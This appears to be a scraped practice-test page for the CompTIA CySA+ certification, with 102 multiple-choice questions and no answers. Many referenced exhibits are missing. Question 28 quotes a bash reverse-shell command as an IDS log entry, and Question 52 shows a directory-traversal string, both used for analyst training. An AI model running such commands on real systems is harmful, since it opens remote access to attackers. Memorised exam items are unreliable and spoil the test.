Pre-Summer Special Flat 65% Limited Time Discount offer - Ends in 0d 00h 00m 00s - Coupon code: suredis

CompTIA CS0-003 CompTIA CyberSecurity Analyst CySA+ Certification Exam Exam Practice Test

Demo: 116 questions
Total 390 questions

CompTIA CyberSecurity Analyst CySA+ Certification Exam Questions and Answers

Question 1

An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?

Options:

A.

DLP

B.

NAC

C.

EDR

D.

NIDS

Question 2

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

Options:

A.

Hacktivist threat

B.

Advanced persistent threat

C.

Unintentional insider threat

D.

Nation-state threat

Question 3

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?

Options:

A.

Enrich the SIEM-ingested data to include all data required for triage.

B.

Schedule a task to disable alerting when vulnerability scans are executing.

C.

Filter all alarms in the SIEM with low severity.

D.

Add a SOAR rule to drop irrelevant and duplicated notifications.

Question 4

A company patches its servers using automation software. Remote SSH or RDP connections are allowed to the servers only from the service account used by the automation software. All servers are in an internal subnet without direct access to or from the internet. An analyst reviews the following vulnerability summary:

Which of the following vulnerability IDs should the analyst address first?

Options:

A.

1

B.

2

C.

3

D.

4

Question 5

An analyst is reviewing a dashboard from the company's SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using?

Options:

A.

MITRE ATT&CK

B.

OSSTMM

C.

Diamond Model of Intrusion Analysis

D.

OWASP

Question 6

Which of the following risk management decisions should be considered after evaluating all other options?

Options:

A.

Transfer

B.

Acceptance

C.

Mitigation

D.

Avoidance

Question 7

A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?

Options:

A.

The current scanners should be migrated to the cloud

B.

Cloud-specific misconfigurations may not be detected by the current scanners

C.

Existing vulnerability scanners cannot scan laaS systems

D.

Vulnerability scans on cloud environments should be performed from the cloud

Question 8

A systems administrator notices unfamiliar directory names on a production server. The administrator reviews the directory listings and files, and then concludes the server has been

compromised. Which of the following steps should the administrator take next?

Options:

A.

Inform the internal incident response team.

B.

Follow the company's incident response plan.

C.

Review the lessons learned for the best approach.

D.

Determine when the access started.

Question 9

A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ensure the application will be able to handle unexpected strings with anomalous formats without crashing. Which of the following processes is the most applicable for testing the application to find how it would behave in such a situation?

Options:

A.

Fuzzing

B.

Coding review

C.

Debugging

D.

Static analysis

Question 10

While reviewing web server logs, a security analyst found the following line:

Which of the following malicious activities was attempted?

Options:

A.

Command injection

B.

XML injection

C.

Server-side request forgery

D.

Cross-site scripting

Question 11

Which of the following best describes the process of requiring remediation of a known threat within a given time frame?

Options:

A.

SLA

B.

MOU

C.

Best-effort patching

D.

Organizational governance

Question 12

Which of the following best describes the key goal of the containment stage of an incident response process?

Options:

A.

To limit further damage from occurring

B.

To get services back up and running

C.

To communicate goals and objectives of theincidentresponse plan

D.

To prevent data follow-on actions by adversary exfiltration

Question 13

A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:

Security Policy 1006: Vulnerability Management

1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.

2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.

3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system.

According to the security policy, which of the following vulnerabilities should be the highest priority to patch?

A)

B)

C)

D)

Options:

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Question 14

A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?

Options:

A.

CVSS 3.0/AVP/AC:L/PR:L/UI:N/S U/C:H/I:H/A:H

B.

CVSS 3.0/AV:A/AC .L/PR:L/UI:N/S:U/C:H/I:H/A:H

C.

CVSS 3.0/AV:N/AC:L/PR:L/UI:N/S;U/C:H/I:H/A:H

D.

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Question 15

A company brings in a consultant to make improvements to its website. After the consultant leaves. a web developer notices unusual activity on the website and submits a suspicious file containing the following code to the security team:

Which of the following did the consultant do?

Options:

A.

Implanted a backdoor

B.

Implemented privilege escalation

C.

Implemented clickjacking

D.

Patched the web server

Question 16

Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the general public, as a best practice? (Select two).

Options:

A.

Law enforcement

B.

Governance

C.

Legal

D.

Manager

E.

Public relations

F.

Human resources

Question 17

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

Options:

A.

AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0

B.

AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:L/A:L - Base Score 7.2

C.

AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4

D.

AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

Question 18

After completing a review of network activity. the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily

at 10:00 p.m. Which of the following is potentially occurring?

Options:

A.

Irregular peer-to-peer communication

B.

Rogue device on the network

C.

Abnormal OS process behavior

D.

Data exfiltration

Question 19

A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review?

Options:

A.

Cyber Threat Intelligence

B.

Common Vulnerabilities and Exposures

C.

Cyber Analytics Repository

D.

ATT&CK

Question 20

An organization has tracked several incidents that are listed in the following table:

Which of the following is the organization's MTTD?

Options:

A.

140

B.

150

C.

160

D.

180

Question 21

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

Options:

A.

External

B.

Agent-based

C.

Non-credentialed

D.

Credentialed

Question 22

A vulnerability scan shows the following vulnerabilities in the environment:

At the same time, the following security advisory was released:

"A zero-day vulnerability with a CVSS score of 10 may be affecting your web server. The vendor is working on a patch or workaround."

Which of the following actions should the security analyst take first?

Options:

A.

Contact the web systems administrator and request that they shut down the asset.

B.

Monitor the patch releases for all items and escalate patching to the appropriate team.

C.

Run the vulnerability scan again to verify the presence of the critical finding and the zero-day vulnerability in the environment.

D.

Forward the advisory to the web security team and initiate the prioritization strategy for the other vulnerabilities.

Question 23

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

Options:

A.

Hard disk

B.

Primary boot partition

C.

Malicious tiles

D.

Routing table

E.

Static IP address

Question 24

After reviewing the final report for a penetration test, a cybersecurity analyst prioritizes the remediation for input validation vulnerabilities. Which of the following attacks is the analyst seeking to prevent?

Options:

A.

DNS poisoning

B.

Pharming

C.

Phishing

D.

Cross-site scripting

Question 25

In the last hour, a high volume of failed RDP authentication attempts has been logged on a critical server. All of the authentication attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following mitigating controls would be most effective to reduce the rate of success of this brute-force attack? (Select two).

Options:

A.

Increase the granularity of log-on event auditing on all devices.

B.

Enable host firewall rules to block all outbound traffic to TCP port 3389.

C.

Configure user account lockout after a limited number of failed attempts.

D.

Implement a firewall block for the IP address of the remote system.

E.

Install a third-party remote access tool and disable RDP on all devices.

F.

Block inbound to TCP port 3389 from untrusted remote IP addresses at the perimeter firewall.

Question 26

An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?

Options:

A.

DKIM

B.

SPF

C.

SMTP

D.

DMARC

Question 27

Which of the following is the most important factor to ensure accurate incident response reporting?

Options:

A.

A well-defined timeline of the events

B.

A guideline for regulatory reporting

C.

Logs from the impacted system

D.

A well-developed executive summary

Question 28

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

Options:

A.

#!/bin/bashnc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" Il echo "OK"

B.

#!/bin/bashps -fea | grep 8080 >dev/null && echo "Malicious activity" I| echo "OK"

C.

#!/bin/bashls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" I| echo "OK"

D.

#!/bin/bashnetstat -antp Igrep 8080 >dev/null && echo "Malicious activity" I| echo "OK"

Question 29

Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program?

Options:

A.

It provides a structured way to gain information about insider threats.

B.

It proactively facilitates real-time information sharing between the public and private sectors.

C.

It exchanges messages in the most cost-effective way and requires little maintenance once implemented.

D.

It is a semi-automated solution to gather threat intellbgence about competitors in the same sector.

Question 30

A healthcare organization must develop an action plan based on the findings from a risk

assessment. The action plan must consist of:

· Risk categorization

· Risk prioritization

. Implementation of controls

INSTRUCTIONS

Click on the audit report, risk matrix, and SLA expectations documents to review their

contents.

On the Risk categorization tab, determine the order in which the findings must be

prioritized for remediation according to the risk rating score. Then, assign a categorization to each risk.

On the Controls tab, select the appropriate control(s) to implement for each risk finding.

Findings may have more than one control implemented. Some controls may be used

more than once or not at all.

If at any time you would like to bring back the initial state of the simulation, please click

the Reset All button.

Options:

Question 31

During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?

Options:

A.

Shut down the server.

B.

Reimage the server

C.

Quarantine the server

D.

Update the OS to latest version.

Question 32

A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:

Which of the following should be completed first to remediate the findings?

Options:

A.

Ask the web development team to update the page contents

B.

Add the IP address allow listing for control panel access

C.

Purchase an appropriate certificate from a trusted root CA

D.

Perform proper sanitization on all fields

Question 33

An organization was compromised, and the usernames and passwords of all em-ployees were leaked online. Which of the following best describes the remedia-tion that could reduce the impact of this situation?

Options:

A.

Multifactor authentication

B.

Password changes

C.

System hardening

D.

Password encryption

Question 34

A technician is analyzing output from a popular network mapping tool for a PCI audit:

Which of the following best describes the output?

Options:

A.

The host is not up or responding.

B.

The host is running excessive cipher suites.

C.

The host is allowing insecure cipher suites.

D.

The Secure Shell port on this host is closed

Question 35

An employee received a phishing email that contained malware targeting the company. Which of the following is the best way for a security analyst to get more details about the malware and avoid disclosing information?

Options:

A.

Upload the malware to the VirusTotal website

B.

Share the malware with the EDR provider

C.

Hire an external consultant to perform the analysis

D.

Use a local sandbox in a microsegmented environment

Question 36

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

Options:

A.

Deploy a CASB and enable policy enforcement

B.

Configure MFA with strict access

C.

Deploy an API gateway

D.

Enable SSO to the cloud applications

Question 37

When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing host details, has bee running for over two days. Which of the following activities will provide the best insight into this potentially malicious process, based on the anomalous behavior?

Options:

A.

Changes to system environment variables

B.

SMB network traffic related to the system process

C.

Recent browser history of the primary user

D.

Activities taken by PID 1024

Question 38

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

Options:

A.

The lead should review what is documented in the incident response policy or plan

B.

Management level members of the CSIRT should make that decision

C.

The lead has the authority to decide who to communicate with at any time

D.

Subject matter experts on the team should communicate with others within the specified area of expertise

Question 39

A security analyst reviews the following extract of a vulnerability scan that was performed against the web server:

Which of the following recommendations should the security analyst provide to harden the web server?

Options:

A.

Remove the version information on http-server-header.

B.

Disable tcp_wrappers.

C.

Delete the /wp-login.php folder.

D.

Close port 22.

Question 40

Which of the following are process improvements that can be realized by implementing a SOAR solution? (Select two).

Options:

A.

Minimize security attacks

B.

Itemize tasks for approval

C.

Reduce repetitive tasks

D.

Minimize setup complexity

E.

Define a security strategy

F.

Generate reports and metrics

Question 41

Which of the following is the best reason to implement an MOU?

Options:

A.

To create a business process for configuration management

B.

To allow internal departments to understand security responsibilities

C.

To allow an expectation process to be defined for legacy systems

D.

To ensure that all metrics on service levels are properly reported

Question 42

Which of the following characteristics ensures the security of an automated information system is the most effective and economical?

Options:

A.

Originally designed to provide necessary security

B.

Subjected to intense security testing

C.

Customized to meet specific security threats

D.

Optimized prior to the addition of security

Question 43

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

Options:

A.

Identify any improvements or changes in the incident response plan or procedures

B.

Determine if an internal mistake was made and who did it so they do not repeat the error

C.

Present all legal evidence collected and turn it over to iaw enforcement

D.

Discuss the financial impact of the incident to determine if security controls are well spent

Question 44

A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack?

Options:

A.

Enabling a user account lockout after a limited number of failed attempts

B.

Installing a third-party remote access tool and disabling RDP on all devices

C.

Implementing a firewall block for the remote system's IP address

D.

Increasing the verbosity of log-on event auditing on all devices

Question 45

Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades Which of the following is the best method to remediate the bugs?

Options:

A.

Reschedule the upgrade and deploy the patch

B.

Request an exception to exclude the patch from installation

C.

Update the risk register and request a change to the SLA

D.

Notify the incident response team and rerun the vulnerability scan

Question 46

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?

Options:

A.

Implementing credentialed scanning

B.

Changing from a passive to an active scanning approach

C.

Implementing a central place to manage IT assets

D.

Performing agentless scanning

Question 47

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?

Options:

A.

Deploy a database to aggregate the logging.

B.

Configure the servers to forward logs to a SIEM-

C.

Share the log directory on each server to allow local access,

D.

Automate the emailing of logs to the analysts.

Question 48

An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:

• created the initial evidence log.

• disabled the wireless adapter on the device.

• interviewed the employee, who was unable to identify the website that was accessed

• reviewed the web proxy traffic logs.

Which of the following should the analyst do to remediate the infected device?

Options:

A.

Update the system firmware and reimage the hardware.

B.

Install an additional malware scanner that will send email alerts to the analyst.

C.

Configure the system to use a proxy server for Internet access.

D.

Delete the user profile and restore data from backup.

Question 49

A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below:

Which of the following has most likely occurred?

Options:

A.

An Office document with a malicious macro was opened.

B.

A credential-stealing website was visited.

C.

A phishing link in an email was clicked

D.

A web browser vulnerability was exploited.

Question 50

During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate the vulnerability at the application level?

Options:

A.

Perform OS hardening.

B.

Implement input validation.

C.

Update third-party dependencies.

D.

Configure address space layout randomization.

Question 51

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

Options:

A.

Code analysis

B.

Static analysis

C.

Reverse engineering

D.

Fuzzing

Question 52

While reviewing the web server logs, a security analyst notices the following snippet:

.. \ .. / .. \ .. /boot.ini

Which of the following Is belng attempted?

Options:

A.

Directory traversal

B.

Remote file inclusion

C.

Cross-site scripting

D.

Remote code execution

E.

Enumeration of /etc/passwd

Question 53

A security analyst must preserve a system hard drive that was involved in a litigation request Which of the following is the best method to ensure the data on the device is not modified?

Options:

A.

Generate a hash value and make a backup image.

B.

Encrypt the device to ensure confidentiality of the data.

C.

Protect the device with a complex password.

D.

Perform a memory scan dump to collect residual data.

Question 54

A company recently experienced a security incident. The security team has determined

a user clicked on a link embedded in a phishing email that was sent to the entire company. The link resulted in a malware download, which was subsequently installed and run.

INSTRUCTIONS

Part 1

Review the artifacts associated with the security incident. Identify the name of the malware, the malicious IP address, and the date and time when the malware executable entered the organization.

Part 2

Review the kill chain items and select an appropriate control for each that would improve the security posture of the organization and would have helped to prevent this incident from occurring. Each

control may only be used once, and not all controls will be used.

Firewall log:

File integrity Monitoring Report:

Malware domain list:

Vulnerability Scan Report:

Phishing Email:

Options:

Question 55

A security analyst received an alert regarding multiple successful MFA log-ins for a particular user When reviewing the authentication logs the analyst sees the following:

Which of the following are most likely occurring, based on the MFA logs? (Select two).

Options:

A.

Dictionary attack

B.

Push phishing

C.

impossible geo-velocity

D.

Subscriber identity module swapping

E.

Rogue access point

F.

Password spray

Question 56

A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of following best fits the type of scanning activity requested?

Options:

A.

Uncredentialed scan

B.

Discqyery scan

C.

Vulnerability scan

D.

Credentialed scan

Question 57

Which of the following is the most appropriate action a security analyst to take to effectively identify the most security risks associated with a locally hosted server?

Options:

A.

Run the operating system update tool to apply patches that are missing.

B.

Contract an external penetration tester to attempt a brute-force attack.

C.

Download a vendor support agent to validate drivers that are installed.

D.

Execute a vulnerability scan against the target host.

Question 58

Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?

Options:

A.

CASB

B.

DMARC

C.

SIEM

D.

PAM

Question 59

A report contains IoC and TTP information for a zero-day exploit that leverages vulnerabilities in a specific version of a web application. Which of the following actions should a SOC analyst take first after receiving the report?

Options:

A.

Implement a vulnerability scan to determine whether the environment is at risk.

B.

Block the IP addresses and domains from the report in the web proxy and firewalls.

C.

Verify whether the information is relevant to the organization.

D.

Analyze the web application logs to identify any suspicious or malicious activity.

Question 60

A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following should the SOC manager utilize to improve the process?

Options:

A.

The most recent audit report

B.

The incident response playbook

C.

The incident response plan

D.

The lessons-learned register

Question 61

The SOC received a threat intelligence notification indicating that an employee's credentials were found on the dark web. The user's web and log-in activities were reviewed for malicious or anomalous connections, data uploads/downloads, and exploits. A review of the controls confirmed multifactor

authentication was enabled. Which of the following should be done first to mitigate impact to the business networks and assets?

Options:

A.

Perform a forced password reset.

B.

Communicate the compromised credentials to the user.

C.

Perform an ad hoc AV scan on the user's laptop.

D.

Review and ensure privileges assigned to the user's account reflect least privilege.

E.

Lower the thresholds for SOC alerting of suspected malicious activity.

Question 62

When starting an investigation, which of the following must be done first?

Options:

A.

Notify law enforcement

B.

Secure the scene

C.

Seize all related evidence

D.

Interview the witnesses

Question 63

A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets. During the initial scan, users reported that network printers began to print pages that contained unreadable text and icons.

Which of the following should the analyst do to ensure this behavior does not oocur during subsequent vulnerability scans?

Options:

A.

Perform non-credentialed scans.

B.

Ignore embedded web server ports.

C.

Create a tailored scan for the printer subnet.

D.

Increase the threshold length of the scan timeout.

Question 64

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

Options:

A.

Set an HttpOnlvflaq to force communication by HTTPS

B.

Block requests without an X-Frame-Options header

C.

Configure an Access-Control-Allow-Origin header to authorized domains

D.

Disable the cross-origin resource sharing header

Question 65

An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Select two).

Options:

A.

Ensure users the document system recovery plan prior to deployment.

B.

Perform a full system-level backup following the change.

C.

Leverage an audit tool to identify changes that are being made.

D.

Identify assets with dependence that could be impacted by the change.

E.

Require diagrams to be completed for all critical systems.

F.

Ensure that all assets are properly listed in the inventory management system.

Question 66

Which of the following is the best authentication method to secure access to sensitive data?

Options:

A.

An assigned device that generates a randomized code for login

B.

Biometrics and a device with a personalized code for login

C.

Alphanumeric/special character username and passphrase for login

D.

A one-time code received by email and push authorization for login

Question 67

A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls, and two-factor authentication. Which of the following

does this most likely describe?

Options:

A.

System hardening

B.

Hybrid network architecture

C.

Continuous authorization

D.

Secure access service edge

Question 68

A security analyst reviews a packet capture and identifies the following output as anomalous:

13:49:57.553161 TP10.203.10.17.45701>10.203.10.22.12930:Flags[FPU],seq108331482,win1024,urg0,length0

13:49:57.553162 IP10.203.10.17.45701>10.203.10.22.48968:Flags[FPU],seq108331482,win1024,urg0,length0

...

Which of the following activities explains the output?

Options:

A.

Nmap Xmas scan

B.

Nikto's web scan

C.

Socat's proxying traffic using the urgent flag

D.

Angry IP Scanner output

Question 69

Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target’s information assets?

Options:

A.

Structured Threat Information Expression

B.

OWASP Testing Guide

C.

Open Source Security Testing Methodology Manual

D.

Diamond Model of Intrusion Analysis

Question 70

A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst. Which of the following is the best way to relay the process information to the junior analyst?

Options:

A.

Ask another team member to demonstrate their process.

B.

Email a link to a website that shows someone demonstrating a similar process.

C.

Let the junior analyst research and develop a process.

D.

Write a step-by-step document on the team wiki outlining the process.

Question 71

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

Options:

A.

Conduct regular red team exercises over the application in production

B.

Ensure that all implemented coding libraries are regularly checked

C.

Use application security scanning as part of the pipeline for the CI/CDflow

D.

Implement proper input validation for any data entry form

Question 72

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware, based on its telemetry?

Options:

A.

Cross-reference the signature with open-source threat intelligence.

B.

Configure the EDR to perform a full scan.

C.

Transfer the malware to a sandbox environment.

D.

Log in to the affected systems and run necstat.

Question 73

A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Which of the following best describes what the analyst will be creating?

Options:

A.

Bots

B.

loCs

C.

TTPs

D.

Signatures

Question 74

An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?

Options:

A.

The finding is a false positive and should be ignored.

B.

A rollback had been executed on the instance.

C.

The vulnerability scanner was configured without credentials.

D.

The vulnerability management software needs to be updated.

Question 75

A security analyst observed the following activity from a privileged account:

. Accessing emails and sensitive information

. Audit logs being modified

. Abnormal log-in times

Which of the following best describes the observed activity?

Options:

A.

Irregular peer-to-peer communication

B.

Unauthorized privileges

C.

Rogue devices on the network

D.

Insider attack

Question 76

An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?

Options:

A.

Disable administrative accounts for any operations.

B.

Implement MFA requirements for all internal resources.

C.

Harden systems by disabling or removing unnecessary services.

D.

Implement controls to block execution of untrusted applications.

Question 77

A security administrator needs to import Pll data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?

Options:

A.

Data masking

B.

Hashing

C.

Watermarking

D.

Encoding

Question 78

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

Options:

A.

Business continuity plan

B.

Vulnerability management plan

C.

Disaster recovery plan

D.

Asset management plan

Question 79

A vulnerability scan shows the following issues:

Asset Type

CVSS Score

Exploit Vector

Workstations

6.5

RDP vulnerability

Storage Server

9.0

Unauthorized access due to server application vulnerability

Firewall

8.9

Default password vulnerability

Web Server

10.0

Zero-day vulnerability (vendor working on patch)

Which of the following actions should the security analyst take first?

Options:

A.

Contact the web systems administrator and request that they shut down the asset.

B.

Monitor the patch releases for all items and escalate patching to the appropriate team.

C.

Run the vulnerability scan again to verify the presence of the critical finding.

D.

Forward the advisory to the web security team and initiate the prioritization strategy for the other vulnerabilities.

Question 80

Which of the following is the best use of automation in cybersecurity?

Options:

A.

Ensure faster incident detection, analysis, and response.

B.

Eliminate configuration errors when implementing new hardware.

C.

Lower costs by reducing the number of necessary staff.

D.

Reduce the time for internal user access requests.

Question 81

A security analyst reviews the following Arachni scan results for a web application that stores PII data:

Which of the following should be remediated first?

Options:

A.

SQL injection

B.

RFI

C.

XSS

D.

Code injection

Question 82

A Chief Information Security Officer wants to lock down the users' ability to change applications that are installed on their Windows systems. Which of the following is the best enterprise-level solution?

Options:

A.

HIPS

B.

GPO

C.

Registry

D.

DLP

Question 83

Which of the following can be used to learn more about TTPs used by cybercriminals?

Options:

A.

ZenMAP

B.

MITRE ATT&CK

C.

National Institute of Standards and Technology

D.

theHarvester

Question 84

During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

Options:

A.

Isolation

B.

Remediation

C.

Reimaging

D.

Preservation

Question 85

Which of the following describes the best reason for conducting a root cause analysis?

Options:

A.

The root cause analysis ensures that proper timelines were documented.

B.

The root cause analysis allows the incident to be properly documented for reporting.

C.

The root cause analysis develops recommendations to improve the process.

D.

The root cause analysis identifies the contributing items that facilitated the event

Question 86

A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that require a connection to the internet. The CPU has an idle process of at least 70%. Which of the following best describes how the security analyst can effectively review the malware without compromising the organization's network?

Options:

A.

Utilize an RDP session on an unused workstation to evaluate the malware.

B.

Disconnect and utilize an existing infected asset off the network.

C.

Create a virtual host for testing on the security analyst workstation.

D.

Subscribe to an online service to create a sandbox environment.

Question 87

Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use?

Options:

A.

MFA

B.

User and password

C.

PAM

D.

Key pair

Question 88

The security team at a company, which was a recent target of ransomware, compiled a list of hosts that were identified as impacted and in scope for this incident. Based on the following host list:

Which of the following systems was most pivotal to the threat actor in its distribution of the encryption binary via Group Policy?

Options:

A.

SQL01

B.

WK10-Sales07

C.

WK7-Plant01

D.

DCEast01

E.

HQAdmin9

Question 89

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

Options:

A.

Isolate Joe's PC from the network

B.

Reimage the PC based on standard operating procedures

C.

Initiate a remote wipe of Joe's PC using mobile device management

D.

Perform no action until HR or legal counsel advises on next steps

Question 90

A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the following log:

Which of the following is most likely occurring, based on the events in the log?

Options:

A.

An adversary is attempting to find the shortest path of compromise.

B.

An adversary is performing a vulnerability scan.

C.

An adversary is escalating privileges.

D.

An adversary is performing a password stuffing attack..

Question 91

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

Options:

A.

Insider threat

B.

Ransomware group

C.

Nation-state

D.

Organized crime

Question 92

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

Options:

A.

TO provide metrics and test continuity controls

B.

To verify the roles of the incident response team

C.

To provide recommendations for handling vulnerabilities

D.

To perform tests against implemented security controls

Question 93

A security analyst is reviewing the following alert that was triggered by FIM on a critical system:

Which of the following best describes the suspicious activity that is occurring?

Options:

A.

A fake antivirus program was installed by the user.

B.

A network drive was added to allow exfiltration of data

C.

A new program has been set to execute on system start

D.

The host firewall on 192.168.1.10 was disabled.

Question 94

A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?

Options:

A.

Integrate an IT service delivery ticketing system to track remediation and closure.

B.

Create a compensating control item until the system can be fully patched.

C.

Accept the risk and decommission current assets as end of life.

D.

Request an exception and manually patch each system.

Question 95

An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender Which of the following information security goals is the analyst most likely trying to achieve?

Options:

A.

Non-repudiation

B.

Authentication

C.

Authorization

D.

Integrity

Question 96

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

Options:

A.

Weaponization

B.

Reconnaissance

C.

Delivery

D.

Exploitation

Question 97

Which of the following is a benefit of the Diamond Model of Intrusion Analysis?

Options:

A.

It provides analytical pivoting and identifies knowledge gaps.

B.

It guarantees that the discovered vulnerability will not be exploited again in the future.

C.

It provides concise evidence that can be used in court

D.

It allows for proactive detection and analysis of attack events

Question 98

A Chief Information Security Officer (CISO) has determined through lessons learned and an associated after-action report that staff members who use legacy applications do not adequately understand how to differentiate between non-malicious emails and phishing emails. Which of the following should the CISO include in an action plan to remediate this issue?

Options:

A.

Awareness training and education

B.

Replacement of legacy applications

C.

Organizational governance

D.

Multifactor authentication on all systems

Question 99

An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?

Options:

A.

SOAR

B.

SIEM

C.

SLA

D.

IoC

Question 100

The Chief Information Security Officer (CISO) wants the same level of security to be present whether a remote worker logs in at home or at a coffee shop. Which of the following should be recommended as a starting point?

Options:

A.

Non-persistent virtual desktop infrastructures (VDI)

B.

Passwordless authentication

C.

Standard-issue laptops

D.

Serverless workloads

Question 101

Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?

Options:

A.

Join an information sharing and analysis center specific to the company's industry.

B.

Upload threat intelligence to the IPS in STIX/TAXII format.

C.

Add data enrichment for IPS in the ingestion pipleline.

D.

Review threat feeds after viewing the SIEM alert.

Question 102

Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operating system events?

Options:

